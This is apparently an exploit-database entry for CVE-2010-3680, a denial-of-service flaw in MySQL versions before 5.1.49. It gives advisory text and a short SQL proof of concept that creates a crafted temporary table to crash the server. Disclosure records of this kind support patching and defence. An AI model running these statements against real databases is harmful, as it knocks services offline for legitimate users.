MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service

Author: Boris Reisig
type: dos
platform: php
port: 
date_added: 2010-08-19 
date_updated: 2014-09-01 
verified: 1 
codes: CVE-2010-3680;OSVDB-67381 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/42598/info

MySQL is prone to a denial-of-service vulnerability.

An attacker can exploit these issues to crash the database, denying access to legitimate users.

This issues affect versions prior to MySQL 5.1.49.

NOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.

mysql> SET storage_engine=MYISAM;

mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT  IF(     NULL  IS NOT NULL,      NULL
, NULL) ; drop table mk_upgrade;